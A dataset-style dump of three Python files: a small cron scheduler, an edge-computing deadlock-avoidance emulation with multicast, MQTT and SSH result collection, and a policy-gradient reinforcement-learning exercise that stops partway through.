source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
mycron.py
|
"""
Custom Cron (scheduler)
"""
import datetime
import time
import threading
class MyCron(object):
"""
Custom cron (scheduler) class
Check tasks at every <base_delay> seconds (can be float). Runs them when they should run (every <freq> checks).
Usage:
cron = MyCron(60) # check once a minute
cron.add_task("taskone", 5, testfun) # call testfun() every 5 minutes
cron.remove_task("taskone") # remove task (so it won't be executed anymore)
Inspiration:
http://stackoverflow.com/questions/373335/suggestions-for-a-cron-like-scheduler-in-python/374207#374207
"""
def __init__(self, base_delay=60.0):
self._base_delay = base_delay
self._tasks = {}
self._last_check = datetime.datetime.now()
self._checker_thread = threading.Thread(target=self._checker)
self._checker_thread.daemon = True
def add_task(self, name, freq, task, *args, **kwargs):
"""Add task to tasklist"""
self._tasks[name] = {
"freq": freq,
"counter": 0,
"task": task,
"args": args,
"kwargs": kwargs,
}
def remove_task(self, name):
"""Remove task from tasklist by name"""
if name in self._tasks:
del self._tasks[name]
def start(self):
"""Start checker thread"""
self._checker_thread.start()
def _checker(self):
"""Main loop of checker thread"""
while True:
self._last_check = datetime.datetime.now()
for name, task in self._tasks.iteritems():
task["counter"] += 1
if task["counter"] >= task["freq"]:
task["counter"] = 0
task["task"](*task["args"], **task["kwargs"])
now = datetime.datetime.now()
if now >= self._last_check:
seconds_since_last_check = 1.0 * (now - self._last_check).microseconds / 1000000
if seconds_since_last_check < self._base_delay:
time.sleep(self._base_delay - seconds_since_last_check)
|
6_rms_wound_wait_NS.py
|
from functools import reduce
from sys import *
import numpy as np
import random as r
import ping_code as pc
import socket
import struct
import subprocess as sp
import threading
from threading import Thread
import ast
import time
import datetime as dt
import os
import psutil
import getpass as gp
from netifaces import interfaces, ifaddresses, AF_INET
import paho.mqtt.client as mqtt
import smtplib
import config
import paramiko
hosts = {} # {hostname: ip}
_tasks = {'t1': {'wcet': 3, 'period': 20, 'deadline': 15},
't2': {'wcet': 1, 'period': 5, 'deadline': 4},
't3': {'wcet': 2, 'period': 10, 'deadline': 8},
't4': {'wcet': 1, 'period': 10, 'deadline': 9},
't5': {'wcet': 3, 'period': 15, 'deadline': 12}
}
# mat = {'p0': ['cpu', 'mem', 'storage']}
_need = {
't1': [7, 4, 3],
't2': [1, 2, 2],
't3': [6, 0, 0],
't4': [0, 1, 1],
't5': [4, 3, 1]
}
allocation = {
't1': [0, 1, 0],
't2': [2, 0, 0],
't3': [3, 0, 2],
't4': [2, 1, 1],
't5': [0, 0, 2]
}
_cpu = [] # cpu plot list
prev_t = 0 # variable for cpu util
_off_mec = 0 # used to keep a count of tasks offloaded from local mec to another mec
_off_cloud = 0 # used to keep a count of tasks offloaded to cloud
_loc = 0 # used to keep a count of tasks executed locally
_inward_mec = 0 # used to keep a count of tasks offloaded from another mec to local mec
deadlock = [1] # keeps count of how many deadlock is resolved
memory = []
mec_waiting_time = {} # {ip : [moving (waiting time + rtt)]}
mec_rtt = {} # {ip: [RTT]}
offload_register = {} # {task: host_ip} to keep track of tasks sent to mec for offload
reoffload_list = [[], {}] # [[task_list],{wait_time}] => records that’s re-offloaded to mec to execute.
discovering = 0 # if discovering == 0 update host
test = []
_time = []
_pos = 0
received_task_queue = [] # [[(task_list,wait_time), host_ip], ....]
received_time = []
thread_record = []
_port_ = 64000
cloud_register = {} # ={client_id:client_ip} keeps address of task offloaded to cloud
cloud_port = 63000
stop = 0
task_record = {} # keeps record of task reoffloaded
task_id = 0
shared_resource_lock = threading.Lock()
t_track = 1
def discovering_group():
global sock1
multicast_group = '224.3.29.71'
server_address = ('', 10000)
# Create the socket
sock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock1.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock1.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def offloading_group():
global sock2
multicast_group = '224.5.5.55'
server_address = ('', 20000)
# Create the socket
sock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# Bind to the server address
sock2.bind(server_address)
# Tell the operating system to add the socket to the multicast group
# on all interfaces.
group = socket.inet_aton(multicast_group)
mreq = struct.pack('4sL', group, socket.INADDR_ANY)
sock2.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def ip_address():
try:
cmd = ['ifconfig eth1 | grep inet | cut -d ":" -f 2 | cut -d " " -f 1']
address = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
if len(address.strip().split('.')) == 4:
return address.strip()
else:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
except Exception as e:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def _memory():
global memory
memory.append(round(algo.memory_percent(), 4))
def m_cpu():
global prev_t
# get cpu
next_t = psutil.cpu_percent(percpu=False)
delta = abs(prev_t - next_t)
prev_t = next_t
_cpu.append(round(delta, 4))
def get_mec_rtts():
for i in mec_rtt:
mec_rtt[i].append(get_rtt(i))
def generate_results():
_memory()
m_cpu()
get_mec_rtts()
def host_ip_set():
global ip_set
ip_set = set()
for ifaceName in interfaces():
addresses = [i['addr'] for i in ifaddresses(ifaceName).setdefault(AF_INET, [{'addr': 'No IP addr'}])]
ip_set.add(', '.join(addresses))
def get_time():
_time_ = []
d = str(dt.datetime.utcnow()).split()
_time_ += d[0].split('-')
g = d[1].split('.')
_time_ += g[0].split(':')
_time_.append(g[1])
return _time_
def get_rtt(host):
rtt = pc.verbose_ping(host)
if rtt:
return round(rtt, 4)
else:
return get_rtt(host)
def gcd(a, b):
if b == 0:
return a
return gcd(b, a % b)
def _lcm(a, b):
return int(a * b / gcd(a, b))
def lcm(_list):
return reduce(_lcm, _list)
def gosh_dist(_range):
return ((23 ** r.randrange(1, 1331)) % r.randrange(1, 1777)) % _range
def on_connect(connect_client, userdata, flags, rc):
# print("Connected with Code :" +str(rc))
# Subscribe Topic from here
connect_client.subscribe(node_id)
# Callback Function on Receiving the Subscribed Topic/Message
def on_message(message_client, userdata, msg):
data = str(msg.payload, 'utf-8')
if data[0] == 'c': # receive from cloud
received_task = data[2:]
# send_client({received_task: get_time()}, cloud_register[received_task.split('.')[2]])
if received_task in task_record:
del task_record[received_task]
received_task = '.'.join(received_task.split('.')[:-1])
_client.publish(topic=received_task.split('.')[2], payload=str({received_task: get_time()+['cloud']}), )
cooperate['cloud'] += 1
count_task_sent(received_task)
elif data[0] == 't': # receive from client
received_task = ast.literal_eval(data[2:])
received_task_queue.append(received_task)
received_time.append(time.time())
else:
print('data: ', data)
def connect_to_broker():
global _client
global broker_ip
username = 'mec'
password = 'password'
broker_ip = hosts['speaker']
broker_port_no = 1883
_client = mqtt.Client()
_client.on_connect = on_connect
_client.on_message = on_message
_client.username_pw_set(username, password)
_client.connect(broker_ip, broker_port_no, 60)
_client.loop_forever()
def task_time_map(seq, process):
exe_seq = []
capacity_sum = 0
for job in process:
capacity_sum += process[job]['wcet']
while capacity_sum > 0:
for job in seq:
if process[job]['wcet'] > 0:
exe_seq.append(job)
process[job]['wcet'] -= 1
capacity_sum -= 1
return exe_seq
def load_tasks():
period_list = [tasks[i]['period'] for i in tasks]
lcm_period = lcm(period_list)
# insert idle task
s_task = {**tasks, 'idle': {'wcet': lcm_period, 'period': lcm_period + 1}}
return lcm_period, s_task
total_received_task = 0
def scheduler(_lcm_, s_tasks): # RMS algorithm
global total_received_task
queue = list(s_tasks.keys()) # initialize task queue
schedule = []
rms = []
curr = '' # current task
prev = '' # previous task
tmp = {}
for task in s_tasks.keys():
tmp[task] = {} # temporary data for each task
tmp[task]['deadline'] = s_tasks[task]['period']
tmp[task]['executed'] = 0
# start scheduling...
# proceed by one timestamp to handle preemption
for _time_ in range(_lcm_):
# insert new tasks into the queue
for t in tmp.keys():
if _time_ == tmp[t]['deadline']:
if s_tasks[t]['wcet'] > tmp[t]['executed']:
# print('Scheduling Failed at %d' % time)
exit(1)
else:
tmp[t]['deadline'] += s_tasks[t]['period']
tmp[t]['executed'] = 0
queue.append(t)
# select next task to be scheduled
_min_ = _lcm_ * 2
for task in queue:
if tmp[task]['deadline'] < _min_:
_min_ = tmp[task]['deadline']
curr = task
tmp[curr]['executed'] += 1
# print(time, queue, curr)
# dequeue the execution-completed task
if tmp[curr]['executed'] == s_tasks[curr]['wcet']:
for i in range(len(queue)):
if curr == queue[i]:
del queue[i]
break
# record to the schedule trace
if prev != curr:
if prev in queue and prev != 'idle': # previous task is preempted..
s = schedule.pop()
schedule.append([s[0], s[1], '*'])
rms.append(s[1])
schedule.append([_time_, curr])
if curr != 'idle':
rms.append(curr)
prev = curr
process = {task: {'wcet': tasks[task]['wcet']} for task in tasks}
rms = task_time_map(seq=rms, process=process)
total_received_task += len(rms)
return rms
# generate execution sequence
def wound_wait(processes, avail, n_need, allocat):
global deadlock
offload = []
# To store execution sequence
exec_seq = []
# Make a copy of available resources
work = [0] * len(processes)
# While all processes are not finished
# or system is not in safe state.
while 0 in work:
ind = work.index(0)
i = processes[ind]
# print('comparing| process: ', i, n_need[i], 'work: ', avail)
if not (False in list(np.greater_equal(avail, n_need[i]))):
exec_seq.append(i)
avail = np.add(avail, allocat[i])
work[ind] = 1
else:
a = list(set(processes) - set(exec_seq) - set(offload))
n = {}
for j in a:
n[j] = sum(allocat[j])
_max = max(n, key=n.get)
# print('work: ', work, 'need: ', _need[_max])
if not (False in list(np.greater_equal(np.array(avail) + np.array(allocat[_max]), n_need[i]))):
offload.append(_max)
avail = np.array(avail) + np.array(allocat[_max])
work[processes.index(_max)] = 1
else:
offload.append(i)
avail = np.array(avail) + np.array(allocat[i])
work[processes.index(i)] = 1
if len(offload) > 0:
print('offloading tasks: ', offload)
cooperative_mec(offload)
deadlock[0] += 1
print('Execution seq: ', exec_seq)
return exec_seq
def get_exec_seq(pro):
# Number of processes
p = len(pro)
processes = ['{}_{}'.format(pro[i], i) for i in range(len(pro))]
# Available instances of resources
avail = [6, 5, 5]
n_need = {i: _need[i[:2]] for i in processes}
# print('need', n_need)
# Resources allocated to processes
allot = {i: allocation[i[:2]] for i in processes}
# return execution sequence
return wound_wait(processes, avail, n_need, allot)
def calc_wait_time(list_seq):
pre = 0
time_dic = {}
for i in list_seq:
j = i.split('_')[0]
time_dic[i] = round(t_time[j][0] + pre, 3)
pre += t_time[j][0]
# waiting time = total waiting time ÷ 2 average waiting time might be too tight
w_send = round(time_dic[list(time_dic.keys())[-1]]/2, 3)
send_message('wt {} {}'.format(ip_address(), str(w_send))) # Broadcasting waiting time to cooperative MECs
return time_dic
def compare_local_mec(list_seq):
time_compare_dict = {i: t_time[i.split('_')[0]][1] > list_seq[i] for i in list_seq}
print('local vs MEC comparison: ', time_compare_dict)
execute_mec = []
execute_locally = []
for i in time_compare_dict:
if time_compare_dict[i]:
execute_locally.append(i)
else:
execute_mec.append(i)
return execute_mec, execute_locally
def calculate_mov_avg(ma1, a1):
if ma1 in mec_waiting_time:
_count = len(mec_waiting_time[ma1])
avg1 = mec_waiting_time[ma1][-1]
else:
_count = 0
avg1 = 0
_count += 1
avg1 = ((_count - 1) * avg1 + a1) / _count
# ma1.append(avg1) #cumulative average formula
# μ_n=((n-1) μ_(n-1) + x_n)/n
return round(avg1, 4)
def send_message(mg):
_multicast_group = ('224.3.29.71', 10000)
try:
# Send data to the multicast group
if mg == 'hello':
smg = mg + ' ' + str([get_hostname(), ip_address()])
sock1.sendto(str.encode(smg), _multicast_group)
print('\nHello message sent')
else:
sock1.sendto(str.encode(mg), _multicast_group)
except Exception as e:
print(e)
def get_hostname():
cmd = ['cat /etc/hostname']
hostname = str(sp.check_output(cmd, shell=True), 'utf-8')[0:-1]
return hostname
def receive_message(): # used for multi-cast message exchange among MEC
global hosts
while True:
if stop == 1:
print('Stopped: receive_message()')
break
else:
data, address = sock1.recvfrom(1024)
_d = data.decode()
if _d[:5] == 'hello':
_data = ast.literal_eval(_d[6:])
hosts[_data[0]] = _data[1]
if _data[1] != host_ip:
mec_rtt[_data[1]] = []
elif (_d[:6] == 'update') and (discovering == 0):
hosts = ast.literal_eval(_d[7:])
# print('received: ', hosts)
for i in hosts:
if i != host_ip:
mec_rtt[i] = []
elif _d[:2] == 'wt':
split_data = _d.split()
if split_data[1] != host_ip:
w_time = calculate_mov_avg(split_data[1], float(split_data[2]) + get_rtt(
address[0])) # calcuate moving average of mec wait time => w_time = wait time + rtt
if split_data[1] in mec_waiting_time:
mec_waiting_time[split_data[1]].append(w_time)
else:
mec_waiting_time[split_data[1]] = [w_time]
def mec_comparison():
# returns min average waiting for all mecs
if len(mec_waiting_time) == 0:
return 0
min_mec = {i: mec_waiting_time[i][-1] for i in mec_waiting_time}
min_wt = min(min_mec, key=min_mec.get)
return min_wt
def cooperative_mec(mec_list):
global _off_cloud
global _off_mec
global task_id, task_record
for i in mec_list:
_host = mec_comparison()
if _host == 0:
# send_cloud([i.split('_')[0], t_time[i.split('_')[0]][0]]) # [task_id,exec_time]
_send_task = f"{i.split('_')[0]}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[i.split('_')[0]][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# cloud_register[i.split('_')[0].split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
else:
j = i.split('_')[0]
_max = np.array([6, 5, 5])
send = 'false'
if not (False in list(np.greater_equal(_max, _need[j[:2]]))):
send = 'true'
# CHECK IF THE MINIMUM MEC WAIT TIME IS LESS THAN LATENCY
if mec_waiting_time[_host][-1] < t_time[j][1] and send == 'true':
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
elif send == 'true' and (get_rtt(_host) < get_rtt(cloud_ip)):
_send_task = f"{j}.{task_id}"
send_offloaded_task_mec('{} {} {}'.format('ex', mec_id(_host), [_send_task, t_time[j][0]]))
task_record[_send_task] = 'mec'
task_id += 1
_off_mec += 1
# SENDS TASK TO MEC FOR EXECUTION
w_send = mec_waiting_time[_host][-1] + 0.001
mec_waiting_time[_host].append(w_send) # adds a new average waiting time
print('\n======SENDING {} TO MEC {}========='.format(i, _host))
else:
_send_task = f"{j}.{task_id}"
_client.publish(cloud_ip, str([_send_task, t_time[j][0]]), )
task_record[_send_task] = 'cloud'
task_id += 1
_off_cloud += 1
# send_cloud([j, t_time[j][0]]) # # [task_id,exec_time]
# cloud_register[j.split('.')[2]] = send_back_host
print('\n=========SENDING {} TO CLOUD==========='.format(i))
outward_mec = 0
offload_check = [0,0]
def execute_re_offloaded_task(offloaded_task):
global outward_mec, offload_check
exec_list = get_exec_seq(offloaded_task[0])
# if len(exec_list) != len(offloaded_task[0]):
# print('\n\n', '@ ' * 50)
# print('exec: ', exec_list, 'off: ', offloaded_task[0])
# print('\n\n', '@ ' * 50)
# offload_check.append((exec_list, offloaded_task[0]))
outward_mec += len(exec_list)
for i in offloaded_task[0]: # i = 't1.1.2.3*1_3'
j = i.split('_')[0]
time.sleep(offloaded_task[1][j] / 2)
# print('j task: ', j)
send_offloaded_task_mec('{} {}'.format(j.split('.')[1], i.split('*')[0]))
clients_record = {}
def count_task_sent(task):
global clients_record
c_id = task.split('.')[2]
if c_id in clients_record:
clients_record[c_id] += 1
else:
clients_record[c_id] = 1
def execute(local):
print('\nExecuting :', local)
for i in local:
j = i.split('_')[0]
_t = t_time[j][0] / 2
time.sleep(_t)
print('#{}'.format(local.index(i) + 1), ' Executed: ', i)
_client.publish(j.split('.')[2], str({j: get_time() + ['local']}), )
count_task_sent(j)
print('============== EXECUTION DONE ===============')
cooperate = {'mec': 0, 'cloud': 0}
def receive_offloaded_task_mec(): # run as a thread
global _inward_mec
global t_track
while True:
if stop == 1:
print('Stopped: receive_offloaded_task_mec()')
break
else:
data, address = sock2.recvfrom(1024)
if len(data.decode()) > 0:
da = data.decode().split(' ')
if (address[0] not in ip_set) and (da[0] == node_id): # send back to client
# send_client({da[1]: get_time()}, offload_register[da[1]]) # send back to client
if da[1] in task_record:
del task_record[da[1]]
task_new = '.'.join(da[1].split('.')[:-1])
_client.publish(da[1].split('.')[2], str({task_new: get_time()+['mec']}), )
count_task_sent(da[1])
cooperate['mec'] += 1
else:
print('*'*30 + f'\n{da[1]} Not in Task Record\n' + '*'*30)
elif (address[0] not in ip_set) and (da[0] == 'ex') and (da[1] == node_id):
_received = ast.literal_eval(da[2] + da[3])
shared_resource_lock.acquire()
task = _received[0] + '*{}'.format(t_track)
reoffload_list[0].append(task)
reoffload_list[1][task] = _received[1]
shared_resource_lock.release()
t_track += 1
_inward_mec += 1
def call_execute_re_offload():
global reoffload_list, outward_mec
global offload_check
while True:
if stop == 1:
print('Stopped: call_execute_re_offload()')
break
else:
if len(reoffload_list[0]) == 1:
t = reoffload_list[0][-1]
time.sleep(reoffload_list[1][t] / 2)
shared_resource_lock.acquire()
reoffload_list[0].remove(t)
del reoffload_list[1][t]
shared_resource_lock.release()
send_offloaded_task_mec('{} {}'.format(t.split('.')[1], t.split('*')[0]))
outward_mec += 1
offload_check[0] += 1
elif len(reoffload_list[0]) > 1:
o = reoffload_list.copy()
offload_check[1] += len(o)
execute_re_offloaded_task(o)
for i in o[0]:
shared_resource_lock.acquire()
reoffload_list[0].remove(i)
del reoffload_list[1][i]
shared_resource_lock.release()
def send_email(msg):
try:
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.ehlo()
server.login(config.email_address, config.password)
subject = 'Deadlock results rms+wound_wait {}'.format(get_hostname())
# msg = 'Attendance done for {}'.format(_timer)
_message = 'Subject: {}\n\n{}\n\n SENT BY RIHANNA \n\n'.format(subject, msg)
server.sendmail(config.email_address, config.send_email, _message)
server.quit()
print("Email sent!")
except Exception as e:
print(e)
def send_offloaded_task_mec(msg):
_multicast_group = ('224.5.5.55', 20000)
try:
sock2.sendto(str.encode(msg), _multicast_group)
except Exception as e:
print(e)
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
def run_me():
global discovering
global hosts
initialization()
while True:
if len(hosts) == mec_no:
print('MEC Details: ', hosts)
del hosts[get_hostname()]
discovering = 1
break
time.sleep(2)
start_loop()
def send_result(host_, data):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
for i in data:
cmd = ('echo "{}" >> /home/mec/result/data.py'.format(i)) # task share : host ip task
stdin, stdout, stderr = c.exec_command(cmd)
except Exception as e:
print(e)
def save_and_abort():
global stop
_id_ = get_hostname()[-1]
result = f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} " \
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} " \
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} " \
f"\noff_cloud{_id_}_7_{mec_no} = {_off_cloud} " \
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}" \
f"\nloc{_id_}_7_{mec_no} = {_loc} " \
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}" \
f"\ntask_received = {total_received_task} \nsent_t = {clients_record}" \
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record}" \
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}" \
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}"
list_result = [
f"\nwt{_id_}_7_{mec_no} = {mec_waiting_time} ",
f"\nrtt{_id_}_7_{mec_no} = {mec_rtt} \ncpu{_id_}_7_{mec_no} = {_cpu} ",
f"\noff_mec{_id_}_7_{mec_no} = {_off_mec} \noff_cloud{_id_}_7_{mec_no} = {_off_cloud} ",
f"\ninward_mec{_id_}_7_{mec_no} = {_inward_mec}",
f"\nloc{_id_}_7_{mec_no} = {_loc} ",
f"\ndeadlock{_id_}_7_{mec_no} = {deadlock} \nmemory{_id_}_7_{mec_no} = {memory}",
f"\ntask_received{_id_}_7_{mec_no} = {total_received_task} \nsent_t{_id_}_7_{mec_no} = {clients_record}",
f"\ncooperate{_id_}_7_{mec_no} = {cooperate} \ntask_record{_id_}_7_{mec_no} = {task_record} "
f"\noutward_mec{_id_}_7_{mec_no} = {outward_mec}",
f"\noffload_check{_id_}_7_{mec_no} = {offload_check}",
]
path_ = 'data/raw/'
if os.path.exists(path_):
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
else:
os.mkdir(path_)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datal.py"
os.system(cmd)
cmd = f"echo '' > {path_}{_id_}_7_{mec_no}datap.py"
os.system(cmd)
file_ = open(f'{path_}{_id_}_7_{mec_no}datap.py', 'w')
for i in list_result:
cmd = f'echo "{i}" >> {path_}{_id_}_7_{mec_no}datal.py'
file_.write(i)
os.system(cmd)
file_.close()
sp.run(
["scp", f"{path_}{_id_}_7_{mec_no}datap.py", f"mec@{hosts['osboxes-0']}:/home/mec/result/python"])
sp.run(
["scp", f"{path_}{_id_}_7_{mec_no}datal.py", f"mec@{hosts['osboxes-0']}:/home/mec/result/linux"])
send_result(hosts['osboxes-0'], list_result)
send_email(result)
if len(task_record) > 0:
for _task_ in task_record:
task_new = '.'.join(_task_.split('.')[:-1])
_client.publish(task_new.split('.')[2], str({task_new: get_time()+[task_record[_task_]]}), )
stop += 1
'''
for i in thread_record:
i.join()
'''
_client.loop_stop()
time.sleep(1)
print('done')
os.system('kill -9 {}'.format(os.getpid()))
def start_loop():
global _loc
global tasks
global t_time
global node_id
global stop
print('\n============* WELCOME TO THE DEADLOCK EMULATION PROGRAM *=============\n')
node_id = mec_id(ip_address())
# print('node id: ', node_id)
_threads_ = [receive_offloaded_task_mec, call_execute_re_offload, connect_to_broker]
for i in _threads_:
Thread(target=i).daemon = True
Thread(target=i).start()
x = gp.getpass('Press any key to Start...').lower()
if x != 'exit':
print('========= Waiting for tasks ==========')
_time_ = dt.datetime.now()
while True:
try:
if len(received_task_queue) > 0:
info = received_task_queue.pop(0)
tasks, t_time = info
print('EDF List of Processes: ', tasks, '\n')
print('\n========= Running Deadlock Algorithm ===========')
lcm_result, task_load = load_tasks()
list_seq = get_exec_seq(scheduler(lcm_result, task_load))
if len(list_seq) > 0: # do only when there is a task in safe sequence
wait_list = calc_wait_time(list_seq)
print('\nWaiting Time List: ', wait_list)
compare_result = compare_local_mec(wait_list)
print('\nExecute Locally: ', compare_result[1])
_loc += len(compare_result[1]) # total number of tasks to be executed locally
print('\nExecute in MEC: ', compare_result[0])
print('\nSending to cooperative platform')
if len(compare_result[0]) > 0:
cooperative_mec(compare_result[0])
execute(compare_result[1])
generate_results()
_time_ = dt.datetime.now()
else:
send_message(str('wt {} 0.0'.format(ip_address())))
time.sleep(.4)
now = dt.datetime.now()
delta = now - _time_
if delta > dt.timedelta(minutes=4):
print('terminating programme 5 mins elapsed')
save_and_abort()
break
except KeyboardInterrupt:
print('\nProgramme Terminated')
save_and_abort()
break
def initialization():
global mec_no
global host_ip
global cloud_ip
host_ip = ip_address()
try:
mec_no = int(input('Number of MECs: ').strip())
cloud_ip = input('Cloud Server IP: ').strip()
print('\nCompiling MEC Details')
h1 = Thread(target=receive_message)
h2 = Thread(target=receive_offloaded_task_mec)
h1.daemon = True
h2.daemon = True
h1.start()
h2.start()
while True:
b = input('Send Hello Message (Y/N): ').strip().lower()
if b == 'y':
send_message('hello')
break
else:
print('\nPlease Type "y" to send Hello message\n')
except KeyboardInterrupt:
print('\nProgramme Terminated')
exit(0)
def main():
global algo
os.system('clear')
print('mec ip: ', ip_address())
algo = psutil.Process()
discovering_group()
offloading_group()
host_ip_set()
run_me()
if __name__ == "__main__":
main()
|
train_pg.py
|
import numpy as np
import tensorflow as tf
import gym
import logz
import scipy.signal
import os
import time
import inspect
from multiprocessing import Process
from gym import wrappers
#============================================================================================#
# Utilities
#============================================================================================#
def build_mlp(
input_placeholder,
output_size,
scope,
n_layers=2,
size=64,
activation=tf.tanh,
output_activation=None
):
#========================================================================================#
# ----------SECTION 3----------
# Network building
#
# Your code should make a feedforward neural network (also called a multilayer perceptron)
# with 'n_layers' hidden layers of size 'size' units.
#
# The output layer should have size 'output_size' and activation 'output_activation'.
#
# Hint: use tf.layers.dense
#========================================================================================#
with tf.variable_scope(scope):
dense = input_placeholder
for _ in range(n_layers):
dense = tf.layers.dense(inputs=dense, units=size, activation=activation)
return tf.layers.dense(inputs=dense, units=output_size, activation=output_activation)
def pathlength(path):
return len(path["reward"])
def discounted_rewards_to_go(rewards, gamma):
""" state/action-centric policy gradients; reward-to-go=True.
"""
rtgs = []
future_reward = 0
# start at time step t and use future_reward to calculate current reward
for r in reversed(rewards):
future_reward = future_reward * gamma + r
rtgs.append(future_reward)
return rtgs[::-1]
def sum_discounted_rewards(rewards, gamma):
""" trajectory-centric policy gradients; reward-to-go=False
"""
return sum((gamma**i) * rewards[i] for i in range(len(rewards)))
#============================================================================================#
# Policy Gradient
#============================================================================================#
def train_PG(exp_name='',
env_name='CartPole-v0',
n_iter=100,
gamma=1.0,
min_timesteps_per_batch=1000,
max_path_length=None,
learning_rate=5e-3,
reward_to_go=True,
animate=True,
logdir=None,
normalize_advantages=True,
nn_baseline=False,
seed=0,
# network arguments
n_layers=1,
size=32
):
start = time.time()
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
locals_ = locals()
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
# Make the gym environment
env = gym.make(env_name)
env = wrappers.Monitor(env, logdir, force=True)
# Is this env continuous, or discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
#========================================================================================#
# Notes on notation:
#
# Symbolic variables have the prefix sy_, to distinguish them from the numerical values
# that are computed later in the function
#
# Prefixes and suffixes:
# ob - observation
# ac - action
# _no - this tensor should have shape (batch size /n/, observation dim)
# _na - this tensor should have shape (batch size /n/, action dim)
# _n - this tensor should have shape (batch size /n/)
#
# Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
# is None
#========================================================================================#
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# ----------SECTION 4----------
# Placeholders
#
# Need these for batch observations / actions / advantages in policy gradient loss function.
#========================================================================================#
sy_ob_no = tf.placeholder(shape=[None, ob_dim], name="ob", dtype=tf.float32)
if discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, ac_dim], name="ac", dtype=tf.float32)
# Define a placeholder for advantages
sy_adv_n = tf.placeholder(shape=[None], name="adv", dtype=tf.float32)
#========================================================================================#
# ----------SECTION 4----------
# Networks
#
# Make symbolic operations for
# 1. Policy network outputs which describe the policy distribution.
# a. For the discrete case, just logits for each action.
#
# b. For the continuous case, the mean / log std of a Gaussian distribution over
# actions.
#
# Hint: use the 'build_mlp' function you defined in utilities.
#
# Note: these ops should be functions of the placeholder 'sy_ob_no'
#
# 2. Producing samples stochastically from the policy distribution.
# a. For the discrete case, an op that takes in logits and produces actions.
#
# Should have shape [None]
#
# b. For the continuous case, use the reparameterization trick:
# The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
#
# mu + sigma * z, z ~ N(0, I)
#
# This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
#
# Should have shape [None, ac_dim]
#
# Note: these ops should be functions of the policy network output ops.
#
# 3. Computing the log probability of a set of actions that were actually taken,
# according to the policy.
#
# Note: these ops should be functions of the placeholder 'sy_ac_na', and the
# policy network output ops.
#
#========================================================================================#
if discrete:
sy_logits_na = build_mlp(input_placeholder=sy_ob_no, output_size=ac_dim,
scope="discrete_policy_network", n_layers=n_layers, size=size,
activation=tf.nn.relu)
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na, 1), axis=[1])
sy_logprob_n = tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
else:
sy_mean = build_mlp(input_placeholder=sy_ob_no, output_size=ac_dim,
scope="continuous_policy_network", n_layers=n_layers, size=size,
activation=tf.nn.relu)
# logstd should just be a trainable variable, not a network output.
sy_logstd = tf.get_variable("logstd", shape=[ac_dim], dtype=tf.float32)
sy_sampled_ac = tf.random_normal(shape=tf.shape(sy_mean), mean=sy_mean, stddev=tf.exp(sy_logstd))
dist = tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean,
scale_diag=tf.exp(sy_logstd))
sy_logprob_n = -dist.log_prob(sy_ac_na)
#========================================================================================#
# ----------SECTION 4----------
# Loss Function and Training Operation
#========================================================================================#
# multiply the log probability by the advantages
# Loss function that we'll differentiate to get the policy gradient.
loss = tf.reduce_mean(tf.multiply(sy_logprob_n, sy_adv_n))
update_op = tf.train.AdamOptimizer(learning_rate).minimize(loss)
